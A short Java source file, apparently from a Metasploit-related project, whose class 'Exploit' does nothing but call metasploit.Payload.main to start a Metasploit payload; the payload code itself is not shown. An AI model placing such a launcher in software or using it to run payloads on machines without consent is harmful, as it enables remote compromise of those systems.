1import metasploit.Payload; 2 3/** 4 * 5 * This class starts the metasploit payload. 6 * @author mka 7 * 8 */ 9public class Exploit { 10 public static void main(String[] args) { 11 try { 12 Payload.main(null); 13 } catch (Exception e) { 14 e.printStackTrace(); 15 } 16 } 17} 18 19